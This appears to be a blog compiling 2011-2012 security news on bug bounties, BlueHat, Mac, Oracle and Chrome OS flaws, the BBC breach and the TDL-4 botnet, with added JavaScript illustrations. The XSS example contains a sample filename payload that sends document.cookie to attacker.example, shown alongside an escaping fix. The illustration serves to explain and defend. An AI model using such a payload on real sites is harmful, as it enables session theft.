
Facebook Launches Security Bug Bounty


Facebook is set to announce today a bug bounty program in which researchers will be paid for reporting security holes in the popular social-networking Web site.
Compensation, which starts at $500 and has no set maximum, will be paid only to researchers who follow Facebook's Responsible Disclosure Policy and agree not to go public with the vulnerability information until Facebook has fixed the problem.
Facebook Chief Security Officer Joe Sullivan said of the time needed to fix a reported bug: "Typically, it's no longer than a day."

Facebook's Whitehat page for security researchers says: 

"If you give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data, and interruption or degradation of our service during your research, we will not bring any lawsuit against you or ask law enforcement to investigate you."

The compensation program is a good way to provide an incentive and show appreciation to the research community for helping keep Facebook safe for users, according to the company's security team. Up until now, researchers received recognition on the Facebook Whitehat page, maybe some "swag," and--if they were lucky--a job.
"Some of our best engineers have come to work here after pointing out security bugs on our site," said Alex Rice, product security lead at Facebook, citing Ryan McGeehan, manager of Facebook's security response team, as one example. (Facebook also recently hired famed iPhone jailbreaker and Sony PlayStation 3 hacker George Hotz, who works on security issues.)
Meanwhile, Facebook is giving security researchers a way to create test accounts on Facebook so that their testing does not violate the terms of use or affect other Facebook users, Rice and McGeehan said.
Facebook is following in the footsteps of Mozilla, which launched its bug bounty program in 2004, and Google, which offers a bug bounty program with payments ranging from $500 to more than $3,000 for Web security holes, as well as a separate program for Chrome bugs.
Microsoft has offered bounties of $250,000 for information leading to the arrest of virus writers, but does not pay researchers who find bugs in its software. Other companies do, however, such as TippingPoint's Zero Day Initiative.
Researchers are typically paid more for bugs in desktop software, because fixing them and pushing the update out to users' computers takes much longer than fixing a Web application, which can be patched centrally and quickly.

According to Facebook:-

Eligibility
To qualify for a bounty, you must:
  • Adhere to our Responsible Disclosure Policy:
    ... give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data and interruption or degradation of our service during your research ...
  • Be the first person to responsibly disclose the bug
  • Report a bug that could compromise the integrity or privacy of Facebook user data, such as:
    • Cross-Site Scripting (XSS)
    • Cross-Site Request Forgery (CSRF/XSRF)
    • Remote Code Injection
  • Reside in a country not under any current U.S. Sanctions (e.g., North Korea, Libya, Cuba, etc.)
Our security team will assess each bug to determine if it qualifies.

Rewards
  • A typical bounty is $500 USD
  • We may increase the reward for specific bugs
  • Only 1 bounty per security bug will be awarded
Exclusions
The following bugs aren't eligible for a bounty (and we don't recommend testing for these):
  • Security bugs in third-party applications (e.g., http://apps.facebook.com/[app_name])
  • Security bugs in third-party websites that integrate with Facebook
  • Security bugs in Facebook's corporate infrastructure
  • Denial of Service Vulnerabilities
  • Spam or Social Engineering techniques


-News Source (Facebook & CNET)



Apple-Based Networks Are More Vulnerable to Attack than Windows (BH 2011)


For many years, Apple enjoyed security through obscurity. The market share for Mac computers was so small that malware creators bypassed it to go after the much bigger target, Microsoft Windows. Not anymore.
Apple’s market share has been slowly rising and the popularity of the iPhone has put Apple’s products into the spotlight. Hackers are taking notice and they’re figuring out that Apple’s computers have security vulnerabilities, some of them more severe than Windows machines, according to a talk by the iSEC Partners security consulting team at the Black Hat security conference today.
Alex Stamos, Paul Youn, and B.J. Orvis of iSEC Partners said in their talk that it is possible for hackers to penetrate a network of Apple Mac computers and lurk undetected while gathering data. They concluded that there were so many vulnerabilities at the networking level that Mac machines could be considered more vulnerable than Windows machines.
Apple has not yet responded to a request for comment. At Black Hat, there will also be talks about the vulnerabilities of other operating systems, including Windows. In years past, security researchers have blamed Microsoft for producing vulnerable Windows code. And immediately following the Apple talk, security researchers had another talk about hacking Google’s Chrome operating system.
“This is all changing,” Stamos said. “If [recent hacking events] tell us anything, it’s that any computer is vulnerable to attack.”
The iSEC team said they looked at attacks on the Mac and its latest operating system, code-named Lion, or OS X version 10.7, from the perspective of Advanced Persistent Threats, or long-term security break-ins on networks of computers. They showed examples of the vulnerabilities and detailed proof that they had hacked into the operating system.
The category of Advanced Persistent Threats is a hot one because Google discovered that, under Operation Aurora, dozens of companies were compromised over a long period of time. And McAfee reported today that a similar attack, dubbed Operation Shady RAT, compromised a total of 72 governments and corporations over a five-year period.
A network of Mac computers can be compromised in the usual way, iSEC's Stamos said. A single user can be tricked into giving up a username and password through social engineering or targeted "phishing" attacks, which use a believable ruse to get you to enter your credentials into a page the attackers control, where they are captured.
Once inside the network, Stamos said, it is easy for the attacker to escalate the privileges he or she holds on the network. That is where Apple's operating system falls down in comparison to Windows. "Once you have access, you can compromise the networking," Orvis said. "Network privilege escalation is where it really gets bad on the Mac."
The security researchers said that Apple has made improvements to security in version 10.7 of OS X, such as putting applications in a “sandbox,” or isolating them so that they can run (or crash) without taking down the rest of the operating system. Still, the researchers said they had figured out a couple of different ways to compromise the security of Macs through a test program dubbed Bonjoof. They said that it’s possible to lurk on a network and cover your tracks so that intelligence can be gathered on a network over time.
“All of Apple’s major authentication protocols suffer” from some kind of weakness, Orvis said.
There are ways to deal with the vulnerabilities, but company security professionals have to know how to use security forensics technology, which can take a long time. In the meantime, attackers can detect the forensics tools and react to their usage in an attempt to hide. The security researchers said they did talk with Apple about the vulnerabilities they found and communicated a number of ideas about how to improve the security of Apple’s computers.


Critical Security Holes In Oracle Database


Security researchers have found serious vulnerabilities in Oracle databases that let an attacker perform SQL injection and other advanced attacks and ultimately gain full privileges, the researchers said. Is Oracle just paying lip service to database security? Some researchers within the database community think so, complaining that as the software juggernaut has grown through acquisitions, such as the blockbuster Sun deal, it hasn't maintained enough resources to securely develop database products and resolve vulnerabilities disclosed by researchers in a timely fashion.
"I would say easy fixes get done pretty quickly, within three to six months, but things that are harder and need some changes in architecture or have an impact on customers where customers have to make some changes to their products, to their software that uses the databases, those things don't get done in the CPU," said Alex Rothacker, manager of Application Security's research arm, TeamSHATTER. "We have a vulnerability disclosed where basically we can brute force any user's password ... we reported this two years ago and they haven't fixed it yet." 

 It's a complaint lodged by many researchers, who say that even as Oracle publicly states it wants to work with the research community to fix database issues, it isn't putting its shoulder into the effort. The numbers show that the proportion of quarterly critical patch updates for Oracle database products has diminished considerably over the last two years.
While some might come to the conclusion that there are fewer updates because Oracle's products are getting more secure, researchers say this trend has occurred simultaneously as the window between disclosure of vulnerabilities and patch releases for them has grown wider.

"They respond immediately and say 'Thank you very much for the information' and so on, but it sometimes takes more than a year to actually release a patch," said Slavik Markovich, VP and CTO of database security for McAfee. "I get the feeling that they don't invest enough or have enough people working on this so it takes a long time to patch." In the meantime, too, new database products--some of them security related, even--are released with the same type of vulnerabilities that researchers have been alerting Oracle to for years.   




Vasilis Pappas Won 'Blue Hat' Security Contest & Grand Prize of $200,000 From Microsoft


Last year software giant Microsoft started the BlueHat security contest. The BlueHat Prize, announced by the company at the 2011 Black Hat security conference in Las Vegas, offers a grand prize of $200,000, a runner-up purse of $50,000, and a third-place award of a one-year subscription to MSDN Universal--a developer's platform for Microsoft products--worth $10,000, to security researchers who design the most effective ways to prevent the exploitation of memory safety vulnerabilities.
This year Microsoft awarded a total of $260,000 to a group of hackers, 'hackers' in the good sense here: the clever programmers who won its BlueHat security contest, including a grand prize of $200,000.

The big prize was awarded to Vasilis Pappas, a PhD student at Columbia University, who was handed the check in an American Idol-style contest finale complete with loud music and confetti. The winners were announced during a party at the Black Hat 2012 conference held this week in Las Vegas. Two other researchers took home significant prizes, too: Ivan Fratric, a researcher at the University of Zagreb in Croatia, got $50,000, and Jared DeMott, a security researcher for Harris Corp., won $10,000.
They all submitted ideas to help solve a really hard security problem called Return-Oriented Programming. ROP is an exploitation technique that chains together short fragments of code already present in a program in order to disable or circumvent its security controls. Twenty people submitted ideas in the contest. Without getting into too much technical detail, Pappas came up with something called kBouncer, which blocks anything that looks like a ROP attack from running. It has become popular these days to pay security researchers bounties, but what's notable about the BlueHat contest is that it paid the researcher for actually coming up with a fix to a problem. Google, Facebook, PayPal and many other companies already run "bug bounty" programs that reward researchers simply for identifying flaws in their systems; Microsoft and Adobe, by contrast, don't pay bounties. Microsoft has promised that this first BlueHat Prize won't be its last, so this may be a sign of a smart new approach to engaging with security researchers for the software giant.
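The post skips over how kBouncer actually decides that something "looks like" ROP, but the published design is public: when a program enters a system call, it reads the processor's Last Branch Record (the last few indirect branches the CPU took) and refuses the call if any recorded return landed on an address that is not immediately preceded by a call instruction, or if the recent indirect branches all landed on short, gadget-like instruction sequences. The JavaScript below is an added toy simulation of those two checks written for this page; it is not code from the contest entry. The program image is a constructed, hypothetical disassembly (addresses and mnemonics invented for illustration), the three branch traces are hand-built, and the thresholds (gadgets of at most 20 instructions, chains of at least 8) are parameters that follow the published design rather than anything stated in the post. The real implementation inspects the bytes before a return target for a call opcode; the toy looks at a mnemonic list instead.

```javascript
// Toy simulation of the two run-time checks kBouncer applies to the CPU's
// Last Branch Record (LBR) when a program enters a system call:
//   (1) every recorded "ret" must land on an address preceded by a call;
//   (2) a long run of landings on short, gadget-like instruction sequences
//       is treated as a ROP chain.
// PROGRAM is a constructed, hypothetical disassembly (address -> mnemonic),
// not a real binary; the traces further down are hand-built as well.

const PROGRAM = new Map([
  [0x1000, "push rbp"],
  [0x1001, "mov rbp, rsp"],
  [0x1004, "call 0x2000"],      // so 0x1009 is a legitimate, call-preceded return target
  [0x1009, "mov rax, [rbp-8]"],
  [0x100d, "leave"],
  [0x100e, "ret"],
  [0x2000, "mov rax, rdi"],
  [0x2003, "ret"],
  // Classic gadgets: "pop reg; ret" pairs ending in a syscall
  [0x3000, "pop rdi"], [0x3001, "ret"],
  [0x3002, "pop rsi"], [0x3003, "ret"],
  [0x3004, "pop rdx"], [0x3005, "ret"],
  [0x3006, "pop rax"], [0x3007, "ret"],
  [0x3008, "syscall"],
]);
// Eight call-preceded gadgets ("call ...; pop rdi; ret"): each one passes
// check (1) on its own, so only check (2) catches a chain of them.
for (let i = 0; i < 8; i++) {
  const base = 0x4000 + i * 8;
  PROGRAM.set(base, "call 0x2000");
  PROGRAM.set(base + 5, "pop rdi");
  PROGRAM.set(base + 6, "ret");
}
const ADDRS = [...PROGRAM.keys()].sort((a, b) => a - b);

function isIndirectBranch(mnemonic) {
  const [op, operand] = mnemonic.split(/\s+/);
  if (op === "ret") return true;
  return (op === "jmp" || op === "call") && !operand.startsWith("0x");
}

// Check (1): is the instruction immediately before `target` a call?
function isCallPreceded(target) {
  const idx = ADDRS.indexOf(target);
  if (idx <= 0) return false;
  return PROGRAM.get(ADDRS[idx - 1]).split(/\s+/)[0] === "call";
}

// Instructions from `target` up to and including the next indirect branch.
// Real code usually runs for far more than a handful of instructions between
// indirect branches; gadgets do not.
function gadgetLength(target) {
  const start = ADDRS.indexOf(target);
  if (start < 0) return Infinity;   // outside the image: cannot be measured here
  let n = 0;
  for (let i = start; i < ADDRS.length; i++) {
    n++;
    if (isIndirectBranch(PROGRAM.get(ADDRS[i]))) return n;
  }
  return n;
}

// `lbr` is an array of {kind, from, to} records, oldest first, like the
// hardware LBR would expose at syscall entry. Returns null when the trace
// looks clean, otherwise a reason string.
function checkLbr(lbr, maxGadget = 20, chainThreshold = 8) {
  for (const b of lbr) {
    if (b.kind === "ret" && !isCallPreceded(b.to)) {
      return `ROP: return to non-call-preceded address 0x${b.to.toString(16)}`;
    }
  }
  let run = 0;
  for (const b of lbr) {
    if (gadgetLength(b.to) <= maxGadget) {
      run++;
      if (run >= chainThreshold) return `ROP: chain of ${run} gadget-like sequences`;
    } else {
      run = 0;
    }
  }
  return null;
}

// Constructed traces: a normal call/return pair, a classic chain whose first
// return already fails check (1), and a chain of call-preceded gadgets.
const BENIGN_TRACE = [
  { kind: "call", from: 0x1004, to: 0x2000 },
  { kind: "ret", from: 0x2003, to: 0x1009 },
];
const CLASSIC_ROP_TRACE = [0x3000, 0x3002, 0x3004, 0x3006].map(
  (to, i) => ({ kind: "ret", from: i === 0 ? 0x100e : to - 1, to }));
const CALL_PRECEDED_ROP_TRACE = Array.from({ length: 8 }, (_, i) =>
  ({ kind: "ret", from: 0x100e, to: 0x4000 + i * 8 + 5 }));

console.log(checkLbr(BENIGN_TRACE));             // null
console.log(checkLbr(CLASSIC_ROP_TRACE));        // ROP: return to non-call-preceded address 0x3000
console.log(checkLbr(CALL_PRECEDED_ROP_TRACE));  // ROP: chain of 8 gadget-like sequences
```

The third trace is the reason both checks exist: a binary of any size contains "call; ...; ret" sequences whose tail is a perfectly usable gadget, so an attacker who only had to satisfy the call-preceded rule could still build a chain. The run-length check is what makes that expensive. Run with `node kbouncer-toy.js` (a hypothetical filename).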


-Source (Microsoft & Business Insider)








Microsoft Started "BlueHat" Contest for Better Security


As any Jedi knight knows, the temptation to turn to the Dark Side is difficult to resist. The same can be true for White Hat hackers--malware fighters who discover vulnerabilities in software.
The black market prices for those kinds of security flaws are as tantalizing to ethical hackers as the malevolent side of The Force was to Luke Skywalker. Microsoft wants to temper those temptations, though, and has announced a contest that offers more than $250,000 in prizes for developing better solutions to counter security threats.
Microsoft's "BlueHat Prize," announced by the company at the Black Hat security conference in Las Vegas Wednesday, offers a grand prize of $200,000, a runner-up purse of $50,000, and a third-place award of a one-year subscription to MSDN Universal--a developer's platform for Microsoft products--worth $10,000, to security researchers who design the most effective ways to prevent the exploitation of memory safety vulnerabilities. Those kinds of vulnerabilities lead to problems like buffer overflows, which Net miscreants exploit to compromise computers.
“As the risk of criminal attacks on private and government computer systems continues to increase, Microsoft recognizes the need to stimulate research in the area of defensive computer security technology," Matt Thomlinson, Microsoft’s General Manager of Trustworthy Computing Group, said.
“Our interest is to promote a focus on developing innovative solutions rather than discovering individual issues," Thomlinson continued. "We believe the BlueHat Prize can catalyze defensive efforts to help mitigate entire classes of attacks."

Top Experts Needed:-

In offering the prize, Microsoft hopes to attract the world's top experts to focus their "little gray cells" on a major security problem. “Microsoft wants to encourage more security experts to think about ways to reduce threats to computing devices," observed Katie Moussouris, senior security strategist lead for the Microsoft Security Response Center.
“We’re looking to collaborate with others to build solutions to tough industry problems," she added. "We believe the BlueHat Prize will encourage the world’s most talented researchers and academics to tackle key security challenges and offer them a chance to impact the world."

The Origin of the Concept:-

According to Microsoft, it got the idea for the BlueHat prize from a previously launched security information-sharing program. That initiative, the Microsoft Active Protections Program (MAPP), allows Microsoft to share information with security vendors around the world so they can release protection technologies to their customers much faster. The success of that program got Microsoft thinking about mounting a similar effort for the security research community.
One vendor with praise for BlueHat was Adobe, a company that's no stranger to software with vulnerabilities. “The Microsoft BlueHat Prize announced at Black Hat [on August 3] is an exciting new initiative and a great example of encouraging community collaboration in the defense against those with malicious intent," observed Adobe's Senior Director for Product Security and Privacy Brad Arkin.
“This call for entries promises to stimulate research activity within the broader security community on how to mitigate entire classes of attacks, rather than thinking about software security as a challenge best addressed one bug at a time," he continued. "This research has the potential to lower costs for third-party developers and increase the level of security assurance for end users."
Microsoft has published official rules and guidelines for the competition. Contest submissions will be accepted until Sunday, April 1, 2012, Microsoft said. A panel of Microsoft security engineers will judge submissions on the following criteria: practicality and functionality (30 percent); robustness, meaning how hard it would be to bypass the proposed solution (30 percent); and impact (40 percent). The winners will be announced at the Black Hat USA conference in 2012.

-News Source (PC World)


PayPal Announced Paid “Bug Bounty” Program for Security Researchers


Payment services giant PayPal recently announced the launch of a paid bug bounty program that will reward security researchers who discover vulnerabilities in its website. In the official blog post, PayPal's Chief Information Security Officer Michael Barrett said: "The security of our customers' data is our number one priority." The move is an obvious one: PayPal is among the sites on which cyber-criminals always keep their eyes, and the program is one more way of strengthening its security.
If you are a security researcher and you've discovered a site or product vulnerability, forward the details to sitesecurity@paypal.com. As a reminder, Facebook, Google and many others started paid bug bounty programs before PayPal.

-:PayPal Bug Bounty Program In Details:-
  • PayPal security team will determine the bounty amount and all decisions are final. 
  • Bounty is awarded to the first person that discovers the previously unknown bug.
  • The bug bounty program is subject to change or to cancellation at any point without notice.
  • Payment is paid out through a verified PayPal account, once the bug is fixed.
  • For all submissions, do not send personal information in your report and please use PayPal's PGP key to encrypt your email.
  • Individuals from sanctioned countries are not allowed to participate in this program.
  • eBay Inc. employees, contractors and their immediate relatives are not allowed to participate in the program.
Vulnerabilities That Are in Scope:
  • XSS
  • CSRF/XSRF
  • SQLi
  • Authentication bypass
Note: While "Logout CSRF" is a well-acknowledged issue, there are other techniques  like "cookie forcing" and "cookie bombardment" that can make it futile to defend against this attack. Also, PayPal's web sessions are relatively short lived and hence the Bug Bounty panel will not consider reports of the ability to log out users from PayPal as qualifying for the reward.
In Your Bug Submission Email, Please Include The Following:
  • Your email address
  • Your PayPal account (in order to receive the bounty)
  • Vulnerability type (i.e., XSS, CSRF, SQLi, etc.)
  • Vulnerability Scope: Domain(s), URL(s) and Parameter(s) impacted
  • Steps to reproduce bug
Guidelines for Responsible Disclosure
  • Share the security issue with us before making it public on message boards, mailing lists, and other forums.
  • Allow us reasonable time to respond to the issue before disclosing it publicly.
  • Provide full details of the security issue.
Terms for Participation :- As between eBay Inc. and the Submitter, as a condition of participation in the PayPal Bug Bounty program, the Submitter grants eBay Inc., its affiliates and customers a perpetual, irrevocable, worldwide, royalty-free and non-exclusive license to use, reproduce, adapt, modify, publish, distribute, publicly perform, create derivative work from, make, use, sell, offer for sale and import the Submission for any purpose. Submitter represents and warrants that the Submission is original to the Submitter and Submitter owns all rights, title and interest in and to the Submission. Submitter waives all other claims of any nature, including express contract, implied-in-fact contract, or quasi-contract, arising out of any disclosure of the Submission to eBay. In no event shall eBay be precluded from discussing, reviewing, developing for itself, having developed, or developing for third parties, materials which are competitive with those set forth in the Submission irrespective of their similarity to the information in the Proposal, so long as eBay complies with the terms of participation stated herein. 







Google Chrome OS Has Security Hole (Black Hat 2011)


Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can be pilfered, and it can't be commandeered when attackers exploit common software vulnerabilities.
But according to two researchers who spent the past few months analyzing the Chrome-powered Cr-48 beta released in December, the browser-based OS is vulnerable to many of the same serious attacks that afflict people surfing websites. As a result, users remain susceptible to exploits that can intercept email, documents, and passwords stored on centralized servers, many of which are maintained by Google.
“Even though they put these awesome security protections in place, we're just moving the security problems to the cloud now,” Matt Johansen, a researcher with WhiteHat Security, told The Register. “We're moving the software security problem that we've been dealing with forever to the cloud. They're doing a lot of things right, but it's not the end all and be all for security.”
Virtually all of the threats identified by Johansen and his WhiteHat colleague Kyle Osborn stem from Chrome's reliance on extensions, which are essentially web-based applications. A fair number of the extensions they analyzed contain XSS, or cross-site scripting, bugs, which have the potential to inject malicious code and content into a visitor's browser and in some cases steal credentials used to authenticate user accounts.
As they went about testing what kind of attacks various XSS vulnerabilities could allow, Johansen and Osborn noticed something curious: a bug in one extension often allowed them to hijack the communications of a second extension, even when the latter one had no identifiable security flaws. At the Black Hat security conference in Las Vegas on Wednesday, they demonstrated this weakness by exploiting an XSS hole in one extension to steal passwords from an otherwise secure account on cloud password storage service LastPass.
“If any of the other vulnerable extensions have an XSS hole, we can utilize JavaScript to hijack that communication,” Johansen said. “LastPass is doing absolutely nothing wrong here. You can have an extension that's perfectly fine, but if you have another that has a cross-site scripting error in it we can still access information in secure applications.”
The discovery has generated a quandary for the researchers.
“Whose problem is this to fix?” Johansen continued. “We don't really have an answer for that. LastPass did everything correctly. It's the other extension developers that developed an extension with a vulnerability in it.”
After being informed of the specific attack, LastPass made changes to its Chrome extension that prevented it from being carried out, so it's reasonable to assume extension makers bear some of the responsibility for preventing their apps from being compromised by others. But Johansen couldn't rule out that vulnerabilities in other apps could make LastPass vulnerable again. He said Google might be able to fix the problem by overhauling the application programming interfaces that extension developers use.
The researchers also demonstrated an XSS vulnerability in Scratchpad, a text-editor extension that's bundled with Chrome. By sharing files with names containing JavaScript commands stored on Google Docs they were able to obtain the Google session cookies of anyone who used a Chromebook to view the documents. An attacker could exploit the vulnerability to read a victim's email, or to send instant messages to everyone on the victim's contact list. If any of the contacts are using Chromebooks, they could be similarly vulnerable to booby-trapped filenames stored on Google Docs.
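The Scratchpad bug is a textbook case of untrusted data, here a document name, reaching the page as markup, and the session cookie went wherever the injected script sent it. The JavaScript below is an added illustration written for this page; it is not the extension's code or the researchers' exploit. The filenames are constructed samples, attacker.example is a hypothetical host, and the two render functions simply stand in for the vulnerable and the hardened way of building the file list.

```javascript
// Added illustration of the Scratchpad-style flaw: a document name from a
// shared file list is placed into the page as HTML. The names below are
// constructed samples; attacker.example is a hypothetical host.
const SAMPLE_FILENAMES = [
  "notes.txt",
  "Q3 budget (draft).txt",
  // A "filename" that is really a payload: it sends document.cookie away once rendered.
  '<img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">',
];

// Vulnerable pattern: untrusted strings concatenated straight into markup
// (the equivalent of element.innerHTML = ... in extension code).
function renderFileListUnsafe(names) {
  return "<ul>" + names.map((n) => `<li>${n}</li>`).join("") + "</ul>";
}

// Escape the five characters that matter for text between tags or inside a
// quoted attribute value.
function escapeHtml(s) {
  const table = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => table[c]);
}

// Hardened pattern: escape at the HTML boundary, so a name can only ever be text.
function renderFileListSafe(names) {
  return "<ul>" + names.map((n) => `<li>${escapeHtml(n)}</li>`).join("") + "</ul>";
}

// Crude post-render check: did any tag other than our own <ul>/<li> survive?
// Escaped output contains no raw "<" at all, so it cannot match.
function hasUnexpectedTag(markup) {
  return /<(?!\/?(?:ul|li)>)[a-z\/]/i.test(markup);
}

console.log(hasUnexpectedTag(renderFileListUnsafe(SAMPLE_FILENAMES))); // true
console.log(hasUnexpectedTag(renderFileListSafe(SAMPLE_FILENAMES)));   // false
```

In real extension code the equivalent fix is to assign the name with textContent or createTextNode instead of innerHTML. A Content Security Policy on the extension page that does not allow inline script would have stopped the onerror handler even if the escaping had been missed, which is the default Chrome later imposed on extensions; defence at both layers is the practitioner's habit.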
A Google spokeswoman defended the security of Chromebooks and said the vulnerabilities enumerated by the researchers weren't unique to the cloud-based OS. In an email, she issued the following statement:
This conversation is about the web, not Chrome OS. Chromebooks raise security protections on computing hardware to new levels. They are also better equipped to handle the web attacks that can affect browsers on any computing device, thanks in part to a carefully designed extensions model and the advanced security available through Chrome that many users and experts have embraced.
The researchers stressed that Google engineers were extremely quick to fix the Scratchpad vulnerability and awarded them a $1,000 bounty for their report. But they remain convinced that the security of Chrome OS is in many cases only as strong as its weakest extension. They also pointed out that penetration-testing tools such as the Browser Exploitation Framework could be used to streamline these attacks, much as Metasploit is used to manage exploits for traditional machines.
And, Johansen said, Chrome hacking through XSS may be only the beginning, since the flaws are among the easiest to find and exploit.
“Who knows what we're going to be looking for months or years from now when Google can figure out a way to thwart the cross-site scripting threat,” he said. “Why would we be trying to write buffer overflows when we can just write a simple JavaScript command.” 
-News Source (The Register)


BBC Server Compromised! Russian Hackers Broke Into FTP & Tried to Sell Unauthorized Access

Earlier we have seen world-renowned media houses like CNN, NBC, Fox News, the Washington Post, the NY Times, NDTV and so on fall victim to hackers and cyber criminals. Now it was the turn of the world's largest and oldest broadcaster, the British Broadcasting Corporation, widely known to us as the BBC. Sources revealed that a cyber criminal managed to breach the BBC's security, secretly took over a server at the BBC and then launched a Christmas Day campaign to convince other cyber criminals to pay him for access to the system.

The attack was first identified by Hold Security LLC, a cyber security firm in Milwaukee that monitors underground cyber crime forums in search of stolen information. It is still not clear whether the hacker stole any information or caused any damage to the site. Speaking to the press, Alex Holden, founder and Chief Information Security Officer of Hold Security, said: "So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC."

The identity of the hacker has not been confirmed, but the firm's researchers observed a notorious Russian hacker known by the monikers "HASH" and "Rev0lver" attempting to sell access to the BBC server on December 25. The BBC's security team managed to secure the site on Saturday, according to a person close to the clean-up efforts. A BBC spokesman refused to comment on the issue, saying, "We do not comment on security issues." Justin Clarke, a principal consultant for the cyber security firm Cylance, noted that accessing that server "establishes a foothold within BBC's network which may allow an attacker to pivot and gain further access to internal BBC resources."

FTP servers are typically used to transfer large data files over the Internet, so the possibility of a data breach cannot be ruled out at this point. For updates on this piece of news and other hot information from the cyber and tech world, stay tuned with VOGH.



TDL Is Targeting Windows PCs; Experts Say It Is "Almost Indestructible"


More than four million PCs have been enrolled in a botnet that security experts say is almost "indestructible". The botnet, known as TDL, targets Windows PCs and is difficult to detect and shut down.
Code that hijacks a PC hides in places security software rarely looks and the botnet is controlled using custom-made encryption.
Security researchers said recent botnet shutdowns had made TDL's controllers harden it against investigation.
The 4.5 million PCs have become victims over the last three months following the appearance of the fourth version of the TDL virus. The changes introduced in TDL-4 made it the "most sophisticated threat today," wrote Kaspersky Labs security researchers Sergey Golovanov and Igor Soumenkov in a detailed analysis of the virus. "The owners of TDL are essentially trying to create an 'indestructible' botnet that is protected against attacks, competitors, and anti-virus companies," wrote the researchers.
Recent successes by security companies and law enforcement against botnets have led to spam levels dropping to about 75% of all e-mail sent, shows analysis by Symantec.
A botnet is a network of computers that have been infected by a virus that allows a hi-tech criminal to use them remotely. Often botnet controllers steal data from victims' PCs or use the machines to send out spam or carry out other attacks.
The TDL virus spreads via booby-trapped websites and infects a machine by exploiting unpatched vulnerabilities. The virus has been found lurking on sites offering porn and pirated movies as well as those that let people store video and image files. The virus installs itself in a system file known as the master boot record. This holds the list of instructions to get a computer started and is a good place to hide because it is rarely scanned by standard anti-virus programs.
The biggest proportion of victims, 28%, are in the US but significant numbers are in India (7%) and the UK (5%). Smaller numbers, 3%, are found in France, Germany and Canada.
However, wrote the researchers, it is the way the botnet operates that makes it so hard to tackle and shut down.
The makers of TDL-4 have cooked up their own encryption system to protect communication between those controlling the botnet. This makes it hard to do any significant analysis of traffic between hijacked PCs and the botnet's controllers.
In addition, TDL-4 sends out instructions to infected machines using a public peer-to-peer network rather than centralised command systems. This foils analysis because it removes the need for command servers that regularly communicate with infected machines.
"For all intents and purposes, [TDL-4] is very tough to remove," Joe Stewart, director of malware research at Dell SecureWorks, told Computerworld. "It's definitely one of the most sophisticated botnets out there."
However, the sophistication of TDL-4 might aid in its downfall, said the Kaspersky researchers, who found bugs in the complex code. These let them pry into databases logging how many infections TDL-4 had racked up, which was aiding their investigation into its creators.

-News Source (BBC)


Vulnerability in Apple MacBooks Which Could Ruin Batteries


One prominent security researcher has discovered a vulnerability in the batteries of Apple's MacBook line of portable computers that could allow hackers to ruin the batteries or install malware on them that could corrupt a Mac.
Charlie Miller, a renowned white-hat hacker who works for security firm Accuvant, plans to reveal and offer a fix next month for a MacBook battery vulnerability he has discovered, Forbes reports. Miller uncovered default passwords, which are used to access the microcontroller in Apple's batteries, within a firmware update from 2009 and used them to gain access to the firmware.

Apple and other laptop makers use embedded chips in their lithium-ion laptop batteries to monitor their power level, stop and start charging, and regulate heat.
During the course of his tests, the researcher "bricked" seven batteries, rendering them unusable by rewriting the firmware. Of more concern is the possibility that hackers could use the vulnerability to install difficult-to-remove malware or, in a worst-case scenario, cause the batteries to explode.

“These batteries just aren’t designed with the idea that people will mess with them,” he said. “What I’m showing is that it’s possible to use them to do something really bad.” According to him, few IT administrators would think to check the battery, providing hackers with an opportunity to hide malicious software on a battery that could repeatedly implant itself on a computer.

Miller admitted that he hasn't tried to blow up any batteries, but he did say it might be possible. "You read stories about batteries in electronic devices that blow up without any interference,” he noted. “If you have all this control, you can probably do it.”
Another researcher, Barnaby Jack, who works for antivirus software maker McAfee, also looked into the battery issue a couple of years ago, but said he didn't get as far as Miller did.

Miller, who is a regular winner of security contests demonstrating Mac, Safari and iPhone exploits, has notified Apple and Texas Instruments of the issue. Despite requests from several other researchers not to proceed, he plans to unveil the vulnerability, along with a fix he calls "Caulkgun," at the Black Hat security conference next month.
"Caulkgun" will change a battery's default passwords to a random string of characters. While the fix will prevent hackers from breaking into the battery, it would also block any future firmware updates from Apple.

In spite of the battery vulnerability that he uncovered, Miller believes Mac OS X security is better than ever before. According to him, Apple engineers made few security-related changes in the jump from Leopard to Snow Leopard, but they made substantial improvements in Mac OS X 10.7 Lion, which was released on Wednesday.
"Now, they've made significant changes and it's going to be harder to exploit,” he said, as noted by The Register.
“It's a significant improvement, and the best way that I've described the level of security in Lion is that it's Windows 7, plus, plus,” said noted security consultant Dino Dai Zovi.
Apple offered security researchers, including Miller and Dai Zovi, an unprecedented early look at Lion in order to get their feedback.
According to researchers, Lion's biggest security improvement is its support for Address Space Layout Randomization. ASLR randomizes the location of critical system components to reduce the risk of attack. Apple also added sandboxing measures in Safari that will isolate potential bugs or malware. Finally, the newly revamped FileVault now allows an entire drive to be encrypted.


-News Source (Appleinsider)


Oracle to Mitigate 73 Security Vulnerabilities in Upcoming Critical Patch Update


Oracle is all set for the upcoming critical patch update. The pre-release announcement by the company indicates that, in all, 73 vulnerabilities across numerous products will be mitigated in the next critical patch update. The update will mitigate security vulnerabilities in Oracle Database Server, Fusion Middleware, Enterprise Manager, E-Business Suite, supply chain products, PeopleSoft, the JD Edwards suite, Siebel CRM, industry applications, Sun products and the OpenOffice suite.

The company releases quarterly critical patch updates on the Tuesday closest to the 17th day of January, April, July and October. The company uses the Common Vulnerability Scoring System (CVSS) version 2.0 to rate vulnerabilities. The vulnerabilities are assigned scores based on the prerequisites for exploiting the vulnerability, the ease of exploitation, and the impact of an attack on availability, confidentiality and integrity. Base scores range from 0.0 to 10.0, with ten being the most severe.

Vulnerabilities may be caused by technological flaws, programming errors and other human errors. Developers are required to constantly upgrade their technical skills through online IT degree courses, training programs and refresher courses to deal with ever-evolving threats.

The critical patch update will address six vulnerabilities in the database server. The vulnerabilities affect components such as Application Service Level Management, Database Vault, Oracle Help, Security Service, Warehouse Builder, UIX and Network Foundation. Two of the six can be exploited without authentication. The highest base score for security flaws affecting the database server is 6.5. The update will also mitigate 9 flaws in Fusion Middleware, 6 of which are exploitable without authentication.

